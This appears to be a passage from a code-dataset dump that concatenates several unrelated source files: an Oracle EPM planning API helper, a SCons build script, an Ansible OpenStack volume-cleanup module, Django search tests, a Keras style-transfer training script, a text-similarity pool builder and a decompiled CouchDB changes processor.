str(data[\"descriptiveStatus\"])\n                client.logger.debug(message + \" - Pinging in 3 seconds...\")\n                time.sleep(3)\n\n    except Exception:\n        client.logger.exception(\"Exception raised while pinging\")\n        raise\n    else:\n        return True  # if we reached here, all went well\n\n\ndef _getLinkByRel(links, rel: str) -> str:\n    \"\"\"\n    Module helper function.\n    Gets the 'href' value of a link object where 'rel' property matches the function parameter.\n\n    Args:\n        links (list of dicts): List of links that are part of API response.\n        rel (str): The rel value for which to return the link\n    Returns:\n        link (str): The 'href' value where 'rel' matches parameter\n    \"\"\"\n    return [link[\"href\"] for link in links if link[\"rel\"] == rel][0]\n\n\ndef _logChildJobErrorList(client, links):\n    \"\"\"\n    Module helper function to log the child job error messages for a failed job.\n\n    Args:\n        client (Client): Client object containing auth and logger\n        links (list of dicts): List of reference links from the API response\n    \"\"\"\n\n    # pull link from links list\n    jobDetailsUrl = _getLinkByRel(links, \"job-details\")\n\n    response = requests.get(jobDetailsUrl, auth=client.auth)\n    data = response.json()\n\n    # get list of links from the first item\n    links = data[\"items\"][0][\"links\"]\n\n    # pull link for child-job-details from list of links\n    childJobDetailsUrl = _getLinkByRel(links, \"child-job-details\")\n\n    limit = 20\n    # only log first number of errors specified by limit (cast to str for URL concatenation)\n    queryParamString = \"?q={\\\"messageType\\\":\\\"ERROR\\\"}&limit=\" + str(limit)\n    response = requests.get(childJobDetailsUrl +\n                            queryParamString, auth=client.auth)\n    data = response.json()\n\n    errorMessages = data[\"items\"]\n    client.logger.error(\n        \"See details of failed child jobs at url:\", childJobDetailsUrl)\n    client.logger.error(\"Failed Child Jobs [limit {}]:\".format(limit), errorMessages)\n","sub_path":"src/epm/planning.py","file_name":"planning.py","file_ext":"py","file_size_in_byte":12571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"13980239","text":"Import('*')\nimport re\nimport sys, os, glob, fnmatch\nimport prebuild\nsys.path.append(Dir('#').abspath + \"\\\\site_scons\\\\site_tools\")\n\ncwd = re.sub(r'output\\\\objs\\\\', '', Dir(\".\").abspath)\nobjects = []\nsources = []\nassemblys = []\nincludes = []\n\nlst = os.listdir(cwd)\n\nfor d in lst:\n    path = os.path.join(cwd, d)\n    if (os.path.isfile(os.path.join(path, 'SConscript'))):\n        objects = objects + SConscript(os.path.join(d, 'SConscript'), exports='env')\n    if (glob.glob(os.path.join(path, '*.h'))):\n        includes.append(str(d))\n    if (glob.glob(os.path.join(path, '*.c')) or glob.glob(os.path.join(path, '*.asm'))):\n        for f in os.listdir(os.path.join(cwd, str(d))):\n            src = os.path.join(str(d), str(f))\n            if f.endswith('.c'):\n                sources.append(str(src))\n            elif f.endswith('.asm'):\n                assemblys.append(str(src))\n# ADD INCLUDE DIRECTORIES\nincludes = list(set(includes))\n\nif includes:\n    for include in includes:\n        env.Append(CPPPATH=[Dir(include).abspath])\n        string = re.sub(r'output\\\\objs\\\\', '', Dir(include).abspath)\n        prebuild.createSymlinkHeader(os.path.join(Dir('#').abspath, env['CEN_HEADER_DIR']), string)\n\n# COMPILE SOURCE FILES\nif sources:\n    for source in sources:\n        m = re.match(r'(.+\\/|.+\\\\)(.*)(\\.c$)', source)\n        target = m.group(2) + \".o\"\n        objects += env.Object(target, source)\n\nif assemblys:\n    for assembly in assemblys:\n        m = re.match(r'(.+\\/|.+\\\\)(.*)(\\.asm$)', assembly)\n        target = m.group(2) + \".o\"\n        objects += env.Object(target, assembly)\n\n\n# RETURN\nReturn('objects')","sub_path":"Targets/TC275/MCAL/MCAL_Modules/Dio/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"529553606","text":"#!/usr/bin/python\n\n\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nANSIBLE_METADATA = {\n    'metadata_version': '1.1',\n    'status': ['preview'],\n    'supported_by': 'community'\n}\n\nDOCUMENTATION = '''\n---\nmodule: import_workload_dst_failure_cleanup\n\nshort_description: Clean up temporary volumes after a workload migration\n\nextends_documentation_fragment: openstack\n\nversion_added: \"2.9.0\"\n\nauthor: \"OpenStack tenant migration tools (@os-migrate)\"\n\ndescription:\n  - Remove any volumes associated with a failed workload migration in the destination cloud.\n\noptions:\n  auth:\n    description:\n      - Required if 'cloud' param not used.\n    required: false\n    type: dict\n  auth_type:\n    description:\n      - Auth type plugin for destination OpenStack cloud. Can be omitted if using password authentication.\n    required: false\n    type: str\n  region_name:\n    description:\n      - Destination OpenStack region name. 
Can be omitted if using default region.\n required: false\n type: str\n availability_zone:\n description:\n - Availability zone.\n required: false\n type: str\n cloud:\n description:\n - Cloud resource from clouds.yml\n - Required if 'auth' param not used\n required: false\n type: raw\n validate_certs:\n description:\n - Validate HTTPS certificates when logging in to OpenStack.\n required: false\n type: bool\n conversion_host:\n description:\n - Dictionary with information about the destination conversion host (address, status, name, id)\n required: true\n type: dict\n data:\n description:\n - Data structure with server parameters as loaded from OS-Migrate workloads YAML file.\n required: true\n type: dict\n log_file:\n description:\n - Path to store a log file for this conversion process.\n required: false\n type: str\n state_file:\n description:\n - Path to store a transfer progress file for this conversion process.\n required: false\n type: str\n ssh_key_path:\n description:\n - Path to an SSH private key authorized on the destination cloud.\n required: true\n type: str\n ssh_user:\n description:\n - The SSH user to connect to the conversion hosts.\n required: true\n type: str\n transfer_uuid:\n description:\n - A UUID used to keep track of this tranfer's resources on the conversion hosts.\n - Provided by the import_workloads_export_volumes module.\n required: true\n type: str\n volume_map:\n description:\n - Dictionary providing information about the volumes to transfer.\n - Provided by the import_workloads_export_volumes module.\n required: true\n type: dict\n timeout:\n description:\n - Timeout for long running operations, in seconds.\n required: false\n default: 1800\n type: int\n'''\n\nEXAMPLES = '''\n rescue:\n - name: clean up in the destination cloud after migration failure\n os_migrate.os_migrate.import_workload_dst_failure_cleanup:\n auth: \"{{ os_migrate_src_auth }}\"\n auth_type: \"{{ os_migrate_src_auth_type|default(omit) }}\"\n region_name: \"{{ os_migrate_src_region_name|default(omit) }}\"\n validate_certs: \"{{ os_migrate_src_validate_certs|default(omit) }}\"\n ca_cert: \"{{ os_migrate_src_ca_cert|default(omit) }}\"\n client_cert: \"{{ os_migrate_src_client_cert|default(omit) }}\"\n client_key: \"{{ os_migrate_src_client_key|default(omit) }}\"\n data: \"{{ item }}\"\n conversion_host:\n \"{{ os_src_conversion_host_info.openstack_conversion_host }}\"\n ssh_key_path: \"{{ os_migrate_conversion_keypair_private_path }}\"\n ssh_user: \"{{ os_migrate_conversion_host_ssh_user }}\"\n transfer_uuid: \"{{ exports.transfer_uuid }}\"\n volume_map: \"{{ exports.volume_map }}\"\n state_file: \"{{ os_migrate_data_dir }}/{{ prelim.server_name }}.state\"\n log_file: \"{{ os_migrate_data_dir }}/{{ prelim.server_name }}.log\"\n when:\n - prelim.changed\n - os_migrate_workload_cleanup_on_failure\n\n - fail:\n msg: \"Failed to import {{ item.params.name }}!\"\n'''\n\nRETURN = '''\n'''\n\nfrom ansible.module_utils.basic import AnsibleModule\n# Import openstack module utils from ansible_collections.openstack.cloud.plugins as per ansible 3+\ntry:\n from ansible_collections.openstack.cloud.plugins.module_utils.openstack \\\n import openstack_full_argument_spec, openstack_cloud_from_module\nexcept ImportError:\n # If this fails fall back to ansible < 3 imports\n from ansible.module_utils.openstack \\\n import openstack_full_argument_spec, openstack_cloud_from_module\n\nfrom ansible_collections.os_migrate.os_migrate.plugins.module_utils import server\n\nfrom 
ansible_collections.os_migrate.os_migrate.plugins.module_utils.workload_common \\\n import use_lock, ATTACH_LOCK_FILE_DESTINATION, DEFAULT_TIMEOUT, OpenStackHostBase\n\nimport time\n\n\nclass OpenStackDstFailureCleanup(OpenStackHostBase):\n \"\"\" Removes volumes after a failed migration from the destination cloud. \"\"\"\n\n def __init__(self, openstack_connection, destination_conversion_host_id,\n ssh_key_path, ssh_user, transfer_uuid, volume_map,\n state_file=None, log_file=None, timeout=DEFAULT_TIMEOUT):\n\n super().__init__(\n openstack_connection,\n destination_conversion_host_id,\n ssh_key_path,\n ssh_user,\n transfer_uuid,\n state_file=state_file,\n log_file=log_file,\n timeout=timeout,\n )\n self.volume_map = volume_map\n\n def delete_migrated_volumes(self):\n \"\"\" Detach destination volumes from converter and delete them. \"\"\"\n self._detach_volumes_from_converter()\n self._delete_volumes()\n\n def _volume_still_attached(self, volume, vm):\n \"\"\" Check if a volume is still attached to a VM. \"\"\"\n for attachment in volume.attachments:\n if attachment.server_id == vm.id:\n return True\n return False\n\n def _get_volume_maybe(self, id_maybe):\n \"\"\" Get volume by id, or None if id_maybe is None or if volume doesn't exist. \"\"\"\n if not id_maybe:\n return None\n return self.conn.get_volume_by_id(id_maybe)\n\n @use_lock(ATTACH_LOCK_FILE_DESTINATION)\n def _detach_volumes_from_converter(self):\n \"\"\" Detach volumes from conversion host. \"\"\"\n self.log.info('Detaching volumes from the destination conversion host.')\n converter = self._converter()\n for path, mapping in self.volume_map.items():\n volume = self._get_volume_maybe(mapping['dest_id'])\n if not volume:\n continue\n if not self._volume_still_attached(volume, converter):\n self.log.info('Volume %s is not attached to conversion host, skipping detach.',\n volume['id'])\n continue\n\n self.log.info('Detaching volume %s.', volume['id'])\n self.conn.detach_volume(server=converter, volume=volume,\n timeout=self.timeout, wait=True)\n for second in range(self.timeout):\n converter = self._converter()\n volume = self.conn.get_volume_by_id(mapping['dest_id'])\n if not self._volume_still_attached(volume, converter):\n break\n time.sleep(1)\n else:\n raise RuntimeError('Timed out waiting to detach volumes from '\n 'destination conversion host!')\n\n def _delete_volumes(self):\n \"\"\" Delete destination volumes. 
\"\"\"\n self.log.info('Deleting migrated volumes from destination.')\n for path, mapping in self.volume_map.items():\n volume = self._get_volume_maybe(mapping['dest_id'])\n if not volume:\n continue\n if volume.attachments:\n self.log.warning('Volume %s is still has attachments, skipping delete.',\n volume['id'])\n continue\n\n self.log.info('Deleting volume %s.', volume['id'])\n self.conn.delete_volume(volume['id'], timeout=self.timeout, wait=True)\n\n\ndef run_module():\n argument_spec = openstack_full_argument_spec(\n data=dict(type='dict', required=True),\n conversion_host=dict(type='dict', required=True),\n ssh_key_path=dict(type='str', required=True),\n ssh_user=dict(type='str', required=True),\n transfer_uuid=dict(type='str', required=True),\n volume_map=dict(type='dict', required=True),\n state_file=dict(type='str', default=None),\n log_file=dict(type='str', default=None),\n timeout=dict(type='int', default=DEFAULT_TIMEOUT),\n )\n\n result = dict(\n changed=False,\n )\n\n module = AnsibleModule(\n argument_spec=argument_spec,\n )\n\n sdk, conn = openstack_cloud_from_module(module)\n src = server.Server.from_data(module.params['data'])\n params, info = src.params_and_info()\n\n # Required parameters\n destination_conversion_host_id = module.params['conversion_host']['id']\n ssh_key_path = module.params['ssh_key_path']\n ssh_user = module.params['ssh_user']\n transfer_uuid = module.params['transfer_uuid']\n volume_map = module.params['volume_map']\n\n # Optional parameters\n state_file = module.params.get('state_file', None)\n log_file = module.params.get('log_file', None)\n timeout = module.params['timeout']\n\n failure_cleanup = OpenStackDstFailureCleanup(\n conn,\n destination_conversion_host_id,\n ssh_key_path,\n ssh_user,\n transfer_uuid,\n volume_map,\n state_file=state_file,\n log_file=log_file,\n timeout=timeout,\n )\n failure_cleanup.delete_migrated_volumes()\n\n module.exit_json(**result)\n\n\ndef main():\n run_module()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"os_migrate/plugins/modules/import_workload_dst_failure_cleanup.py","file_name":"import_workload_dst_failure_cleanup.py","file_ext":"py","file_size_in_byte":9937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"46021515","text":"from django.test import TestCase\nfrom django.contrib.auth import get_user_model\nfrom products.models import Product, Category, Favorite, Comment\nfrom django.test import Client\nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\nfrom django.utils import timezone\n\n\nclass TestSearchView(TestCase):\n \"\"\" All the tests for Search view \"\"\"\n #test search unhealthy product to send to jquery\n def setUp(self):\n self.cat = Category.objects.create(\n name_cat = 'yaourt',\n )\n\n Product.objects.create(\n name_prod='test product',\n nutrition_grade='e',\n rep_nutritionnel='https://static.openfoodfacts.org/images/products/376/020/616/0102/ingredients_fr.12.full.jpg',\n image = 'https://static.openfoodfacts.org/images/products/376/020/616/0102/front_fr.11.full.jpg',\n url = 'https://fr.openfoodfacts.org/produit/3760206160102/yaourt-artisanal-noix-de-coco-ibaski',\n category = Category.objects.get(name_cat=self.cat)\n )\n self.e_product = Product.objects.get(name_prod='test product')\n\n\n Product.objects.create(\n name_prod='test product 2',\n nutrition_grade='a',\n rep_nutritionnel='https://static.openfoodfacts.org/images/products/345/020/616/0102/ingredients_fr.12.full.jpg',\n image = 
'https://static.openfoodfacts.org/images/products/345/020/616/0102/front_fr.11.full.jpg',\n url = 'https://fr.openfoodfacts.org/produit/3760206160103/yaourt-artisanal-noix-de-coco-ibaski',\n category = Category.objects.get(name_cat=self.cat)\n )\n self.a_product = Product.objects.get(name_prod='test product 2')\n\n Product.objects.create(\n name_prod='test 3',\n nutrition_grade='e',\n rep_nutritionnel='https://static.openfoodfacts.org/images/products/376/020/616/0103/ingredients_fr.12.full.jpg',\n image = 'https://static.openfoodfacts.org/images/products/376/020/616/0103/front_fr.11.full.jpg',\n url = 'https://fr.openfoodfacts.org/produit/3760206160103/yaourt-artisanal-noix-de-coco-ibaski',\n category = Category.objects.get(name_cat=self.cat)\n )\n self.e_product_2 = Product.objects.get(name_prod='test 3')\n\n\n User.objects.create(\n first_name='user_test',\n username='utilisateur@gmail.com',\n password='mot_de_passe'\n )\n self.users = User.objects.get(first_name=\"user_test\")\n\n Favorite.objects.create(\n product=self.e_product,\n substitute=self.a_product,\n user=self.users\n )\n self.subs = Favorite.objects.get(substitute=self.a_product)\n\n Comment.objects.create(\n product = Product.objects.get(name_prod='test product 2'),\n author = User.objects.get(first_name='user_test'),\n text = 'Très bon et pas cher',\n created_date = timezone.now(),\n # created_date = '2019-04-16 12:08',\n approved_comment = True\n )\n self.comment = Comment.objects.get(text='Très bon et pas cher')\n\n\n def test_search_unhealthy(self):\n get_product = Product.objects.filter(\n nutrition_grade__range = ('d','e'), name_prod__icontains = 'test product')\n for item in get_product:\n my_product = f'{item.name_prod}'\n self.assertEqual(my_product, 'test product')\n\n #test search healthy product\n def test_search_healthy(self):\n get_product = Product.objects.filter(\n nutrition_grade__range = ('a','b'), name_prod__icontains = 'test product 2')\n for item in get_product:\n my_product = f'{item.name_prod}'\n self.assertEqual(my_product, 'test product 2')\n\n # #test search page is called\n # def test_uses_search_template(self):\n # response = self.client.get(reverse(\"search:search\"))\n # self.assertEqual(response.status_code, 200)\n\n#test detail page - product exists\n def test_product_detail_view_exist(self):\n id_exist = Product.objects.get(name_prod='test product').id\n response = self.client.get(reverse('search:details', args=(id_exist,)))\n self.assertEqual(response.status_code, 200)\n\n#test favorite page - get favorite for a specific user\n def test_get_favorite(self):\n subs_id = self.subs.id\n response = self.client.get('favorite', args=(subs_id,))\n fav = Favorite.objects.first()\n self.assertEqual(self.users, fav.user)\n\n#test comment belongs to the right user\n def test_comment_displayed(self):\n id_healthy = Product.objects.get(name_prod='test product 2')\n self.get_author = Comment.objects.get(product=id_healthy,\n approved_comment=True)\n user = User.objects.first()\n self.assertEqual(self.get_author.author, user)\n\n#test paginator - access an existing page\n def test_access_search(self):\n #access first page\n results = Product.objects.get(name_prod='test product')\n num = 1\n url = '?page={0}&txtSearch={1}'.format(num, results)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n\n#access non existing page\n def test_no_access_search(self):\n for i in range(15):\n Product.objects.create(\n name_prod='test product pagination',\n nutrition_grade='a',\n 
rep_nutritionnel='https://static.openfoodfacts.org/images/products/376/020/616/0109/ingredients_fr.12.full.jpg',\n image = 'https://static.openfoodfacts.org/images/products/376/020/616/0109/front_fr.11.full.jpg',\n url = 'https://fr.openfoodfacts.org/produit/3760206160102/yaourt',\n category = Category.objects.get(name_cat=self.cat))\n\n results_bis = Product.objects.get(name_prod='test product 2')\n num_bis = 4\n url_bis = '?page={0}&txtSearch={1}'.format(num_bis, results_bis)\n response = self.client.get(\"search/{0}\".format(url_bis))\n self.assertEqual(response.status_code, 404)\n","sub_path":"search/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"531373540","text":"import argparse\nimport logging\nimport json\nimport os\nimport datetime\nimport keras\n\nfrom collections import namedtuple\nfrom style_transfer import trainer\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger('train_network')\n\n# The default layers are those suggested by Johnson et al.\n# The names map to those used in the VGG16 application included\n# with Keras.\n_DEFAULT_STYLE_LAYERS = [\n 'block1_conv2', 'block2_conv2',\n 'block3_conv3', 'block4_conv3'\n]\n_DEFAULT_CONTENT_LAYERS = ['block3_conv3']\n\n# def training_with_config(dict_config):\n# json_config = json.dumps(dict_config)\n# training_with_json(json_config)\n\ndef training_with_json(json_config):\n # args = json.loads(json_config, object_hook=lambda d: namedtuple('Config', d.keys())(*d.values()))\n args = json.loads(json_config)\n training(args)\n\ndef training_with_command(args):\n dict_config = vars(args)\n\n # Set the content and style loss layers.\n content_layers = _DEFAULT_CONTENT_LAYERS\n if args.content_layers:\n content_layers = args.content_layers.split(',')\n\n style_layers = _DEFAULT_STYLE_LAYERS\n if args.style_layers:\n style_layers = args.style_layers.split(',')\n\n style_image_files = args.style_images.split(',')\n image_size = [int(el) for el in args.image_size.split(',')]\n norm_by_channels = args.norm_by_channels or False\n\n dict_config['content_layers'] = content_layers\n dict_config['style_layers'] = style_layers\n dict_config['style_image_files'] = style_image_files\n dict_config['image_size'] = image_size\n dict_config['norm_by_channels'] = norm_by_channels\n\n training(dict_config)\n\n\ndef training(args):\n # use fp16 or not\n # use_fp_16 = args.get(\"use_fp16\", False)\n # if use_fp_16:\n # keras.backend.set_floatx('float16')\n\n # Create model folder like: illegal_beauty_modified_jpg/512_a1_b8_sw1e-05_finetuned/current_time\n style_image = args['style_image_files'][0]\n head, tail = os.path.split(style_image)\n style_name = tail.replace('.','_')\n style_size = str(args['image_size'][0])\n alpha = 'a'+ str(args['alpha'])\n batch_size = 'b' + str(args['batch_size'])\n style_weight = 'sw' + str(args['style_weight'])\n total_variation_weight = 'tvw' + str(args['total_variation_weight'])\n finetuned = ''\n if args['fine_tune_checkpoint']:\n finetuned = '_finetuned'\n\n param_str = style_size + '_' + alpha + '_' + batch_size + '_' + style_weight +'_'+ total_variation_weight + finetuned\n model_name = style_name + '_' + param_str\n\n folder = args['model_folder']\n now = datetime.datetime.now().strftime(\"%Y-%m-%d_%H_%M_%S\")\n path = os.path.join(folder, style_name, param_str, now)\n\n model_path_no_file_extension = os.path.join(path, model_name)\n model_checkpoint_name = 
model_path_no_file_extension\n\n try:\n os.makedirs(path, 0o755)\n except OSError:\n print(\"Creation of the directory %s failed\" % path)\n else:\n print(\"Successfully created the directory %s \" % path)\n\n trainer.train(\n args['training_image_dset'],\n args['style_image_files'],\n model_checkpoint_name,\n args['content_layers'],\n args['style_layers'],\n content_weight=args['content_weight'],\n style_weight=args['style_weight'],\n total_variation_weight=args['total_variation_weight'],\n image_size=args['image_size'],\n alpha=args['alpha'],\n batch_size=args['batch_size'],\n num_iterations=args['num_iterations'],\n learning_rate=args['learning_rate'],\n log_interval=args['log_interval'],\n checkpoint_interval=args['checkpoint_interval'],\n fine_tune_checkpoint=args['fine_tune_checkpoint'],\n norm_by_channels=args['norm_by_channels'],\n gcs_bucket=args['gcs_bucket'],\n use_small_network=args['use_small_network'],\n copy_interval=args['copy_interval']\n )\n\n logger.info('Done.')\n\n last_model_name = model_path_no_file_extension + '-' + str(args['num_iterations']) + '.h5'\n return style_name, param_str, now, last_model_name\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Train a Style Transfer Network.'\n )\n\n parser.add_argument(\n '--model-folder', type=str, required=True,\n help='An folder to save the trained network and etc.'\n )\n parser.add_argument(\n '--training-image-dset', type=str, required=True,\n help=('An h5 file containing images to trian with. The dset must '\n 'contain a key `images` with the arrays.')\n )\n parser.add_argument(\n '--style-images', type=str, required=True,\n help='A comma separated list of images to take styles from.'\n )\n parser.add_argument(\n '--model-checkpoint-name', type=str, required=True,\n help='An file to save the trained network.'\n )\n parser.add_argument(\n '--image-size', default='256,256', type=str,\n help='The size of the image H,W'\n )\n parser.add_argument(\n '--content-layers', type=str,\n help=('A comma separated list of VGG layers to use for '\n 'computing content loss')\n )\n parser.add_argument(\n '--style-layers', type=str,\n help=('A comma separated list of VGG layers to use for '\n 'computing style loss')\n )\n parser.add_argument(\n '--content-weight', type=float, default=1.0,\n help='Content loss weight'\n )\n parser.add_argument(\n '--style-weight', type=float, default=1e-4,\n help='Style loss weight'\n )\n parser.add_argument(\n '--total-variation-weight', type=float, default=0,\n help='Total variation loss weight'\n )\n parser.add_argument(\n '--num-iterations', type=int, default=40000,\n help='Number of iterations to train for.'\n )\n parser.add_argument(\n '--batch-size', type=int, default=4,\n help='The batch size to train with.'\n )\n parser.add_argument(\n '--learning-rate', type=float, default=0.001,\n help='The learning rate.'\n )\n parser.add_argument(\n '--log-interval', type=int, default=10,\n help='the interval at which log statements are printed.'\n )\n parser.add_argument(\n '--checkpoint-interval', type=int, default=10,\n help='the interval at which model checkpoints are saved.'\n )\n parser.add_argument(\n '--fine-tune-checkpoint', type=str,\n help='A checkpoint file to finetune from.'\n )\n parser.add_argument(\n '--alpha', type=float, default=1.0,\n help='the width parameter controlling the number of filters'\n )\n parser.add_argument(\n '--norm-by-channels', action='store_true',\n help='if present, normalize gram matrix by channel'\n )\n parser.add_argument(\n 
'--gcs-bucket', type=str,\n help='a gcs bucket to save results to.'\n )\n parser.add_argument(\n '--use-small-network', action='store_true',\n help=('Use a very small network architecture that works in real time '\n 'on some mobile devices using only CPU')\n )\n parser.add_argument(\n '--copy-interval', type=int, default=1000,\n help='Save multiple models by iteration count like model-100, model-2000 and etc.'\n )\n parser.add_argument(\n '--use-fp16', type=bool, default=False,\n help='Use fp16 for training'\n )\n\n args, unknown = parser.parse_known_args()\n training_with_command(args)\n","sub_path":"style_transfer/style_transfer/train2.py","file_name":"train2.py","file_ext":"py","file_size_in_byte":7496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"94004242","text":"import pandas as pd\nfrom tqdm import tqdm\nimport nltk\nfrom multiprocessing import Pool,cpu_count\nfrom copy import deepcopy\nimport math\nimport sys\nimport gensim\nfrom functools import partial\nimport os\nimport numpy as np\nimport pickle\n\ndef contain_digits(token):\n return any(char.isdigit() for char in token)\n\n\ndef initializer():\n global sw\n sw = set(nltk.corpus.stopwords.words('english'))\n sw.add(\"s\")\n\n\n\ndef read_df(fname):\n df = pd.read_csv(fname,delimiter=\"\\t\",names=[\"query\",\"input_paragraph\"])\n return df\n\n\ndef list_multiprocessing(param_lst, func, **kwargs):\n workers = kwargs.pop('workers')\n with Pool(workers,initializer,()) as p:\n apply_lst = [([params], func, i, kwargs) for i, params in enumerate(param_lst)]\n result = list(tqdm(p.imap(_apply_lst, apply_lst), total=len(apply_lst)))\n return [_[1] for _ in result]\n\n\ndef _apply_lst(args):\n params, func, num, kwargs = args\n return num, func(*params, **kwargs)\n\ndef read_queries(fname):\n result=[]\n with open(fname) as f:\n for line in f:\n query = line.split(\":\")[1].rstrip()\n result.append(\"_\".join(query.split()))\n return result\n\ndef get_args(translations_dir,queries):\n return [translations_dir+query for query in queries]\n\n\n\n\ndef cosine_similarity(v1,v2):\n sumxx, sumxy, sumyy = 0, 0, 0\n for i in range(len(v1)):\n x = v1[i]; y = v2[i]\n sumxx += x*x\n sumyy += y*y\n sumxy += x*y\n if sumxx==0 or sumyy==0:\n return 0\n return sumxy/math.sqrt(sumxx*sumyy)\n\n\ndef is_in(query,text):\n res = set(query.split()).intersection(text.rstrip().split())\n return bool(res)\n\n\ndef load_vector(fname):\n with open(fname,\"rb\") as file:\n return pickle.load(file)\n\n\ndef calculate_similarities(query, centroid,sentence, fname):\n if is_in(query, sentence):\n return -float(\"inf\")\n cent_sentence = load_vector(fname)\n if cent_sentence is None:\n return -float(\"inf\")\n return cosine_similarity(centroid,cent_sentence)\n\n\ndef insert_to_queue(q,sim,paragraph,min_val):\n if len(q)<100:\n q.append((sim,paragraph))\n min_val = min(q,key=lambda x:x[0])[0]\n return q,min_val\n elif sim>min_val:\n q.append((sim,paragraph))\n q= sorted(q,key=lambda x:x[0])\n return q[1:],q[1][0]\n return q,min_val\n\ndef find_most_similar_sentences(input_vector_dir, input_file,cluster_dir, input_dir, query):\n df = pd.read_csv(input_file,delimiter = \",\",header=0,chunksize=100000)\n centroid = load_vector(cluster_dir + query+\".pkl\")\n queue = []\n q = \" \".join(query.split(\"_\"))\n min_val = -float(\"inf\")\n global_index =0\n for chunk in df:\n for row in chunk.itertuples():\n sentence =str(row[4])\n if sentence==\"\":\n continue\n fname = 
input_vector_dir+str(global_index%1000)+\"/\"+str(global_index)+\".pkl\"\n sim = calculate_similarities(q,centroid=centroid,sentence=sentence,fname=fname)\n queue,min_val=insert_to_queue(queue,sim,sentence,min_val)\n global_index+=1\n rows ={}\n i=0\n for item in queue:\n row={}\n row[\"query\"]=q\n row[\"input_paragraph\"] = item[1]\n rows[i]=row\n i+=1\n pd.DataFrame.from_dict(rows,orient=\"index\").to_csv(input_dir+query)\n\ndef recovery_mode(queries,output_dir,target_dir):\n finished = [f.replace(\".csv\",\"\") for f in os.listdir(output_dir)]\n updated_queries = [q for q in queries if q not in finished and os.path.isfile(target_dir+q)]\n return updated_queries\n\n\nif __name__==\"__main__\":\n input_dir = sys.argv[1]\n target_dir = sys.argv[2]\n queries_file = sys.argv[3]\n model_file = sys.argv[4]\n input_file = sys.argv[5]\n input_vector_dir = sys.argv[6]\n cluster_dir = sys.argv[7]\n recovery = sys.argv[8]\n queries = read_queries(queries_file)\n print(\"there are \",str(len(queries)),\"queries\",flush=True)\n if recovery == \"True\":\n queries = recovery_mode(queries,input_dir,target_dir)\n print(\"Recovery mode detected, updated number of queries:\" + str(len(queries)))\n func = partial(find_most_similar_sentences,input_vector_dir, input_file,cluster_dir,input_dir)\n if not os.path.exists(input_dir):\n os.makedirs(input_dir)\n workers = cpu_count()-1\n list_multiprocessing(queries,func,workers=workers)\n\n\n\n\n\n\n\n","sub_path":"summarization/create_input_pool_computed_vecs.py","file_name":"create_input_pool_computed_vecs.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"339105925","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-i686/egg/couchutil/changes.py\n# Compiled at: 2010-01-19 08:32:26\n__doc__ = '\\nGeneral-purpose CouchDB utilities.\\n'\nimport itertools, logging, time\nlog = logging.getLogger()\n\nclass ChangesProcessor(object):\n \"\"\"\n Utility class to process updates in a CouchDB database since some known\n point in the database's history.\n\n When called, the processor uses the database's _all_docs_by_seq view to\n walk the changes in sequence. Progress is stored in the statefile to make\n future calls efficient.\n\n By default, the processor does nothing. Subclass it and override\n handle_update and handle_delete. 
You can also override at the\n handle_changes level if necessary.\n \"\"\"\n\n def __init__(self, db, statefile, batch_size=25, forever=False, poll_delay=None):\n self.db = db\n self.__statefile = statefile\n self.batch_size = batch_size\n self.forever = forever\n self.poll_delay = poll_delay\n\n def __call__(self):\n if self.forever and self.poll_delay:\n self.run_forever_poll()\n elif self.forever:\n self.run_forever()\n else:\n self.run_once()\n\n def run_forever_poll(self):\n while True:\n self.run_once()\n time.sleep(self.poll_delay)\n\n def run_forever(self):\n while True:\n changes_resource = self.db.resource('_changes')\n startkey = self._read_startkey()\n args = {'feed': 'longpoll'}\n if startkey is not None:\n args['since'] = startkey\n (headers, changes) = changes_resource.get(**args)\n for batch in ibatch(changes['results'], self.batch_size):\n batch = list(batch)\n self.handle_changes([ result['id'] for result in batch ])\n self._write_startkey(batch[(-1)]['seq'])\n\n self._write_startkey(changes['last_seq'])\n\n return\n\n def run_once(self):\n while True:\n startkey = self._read_startkey()\n log.debug('Reading updates from %r', startkey)\n args = {'limit': self.batch_size}\n if startkey is not None:\n args['startkey'] = startkey\n rows = list(self.db.view('_all_docs_by_seq', **args))\n if not rows:\n break\n self.handle_changes([ row['id'] for row in rows ])\n self._write_startkey(rows[(-1)]['key'])\n\n return\n\n def handle_changes(self, ids):\n for row in self.db.view('_all_docs', keys=ids, include_docs=True):\n if row.doc is None:\n self.handle_delete(row.key)\n else:\n self.handle_update(row.doc)\n\n return\n\n def handle_delete(self, docid):\n log.debug('Ignoring deletion: %s', docid)\n\n def handle_update(self, doc):\n log.debug('Ignoring update: %s@%s', doc['_id'], doc['_rev'])\n\n def _read_startkey(self):\n try:\n return int(open(self.__statefile, 'rb').read())\n except IOError:\n return\n\n return\n\n def _write_startkey(self, startkey):\n open(self.__statefile, 'wb').write(str(startkey))\n\n\ndef ibatch(iterable, size):\n sourceiter = iter(iterable)\n while True:\n batchiter = itertools.islice(sourceiter, size)\n yield itertools.chain([batchiter.next()], batchiter)","sub_path":"pycfiles/couchutils-0.4.0-py3-none-any/changes.py","file_name":"changes.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"533565736","text":"#!/usr/bin/env 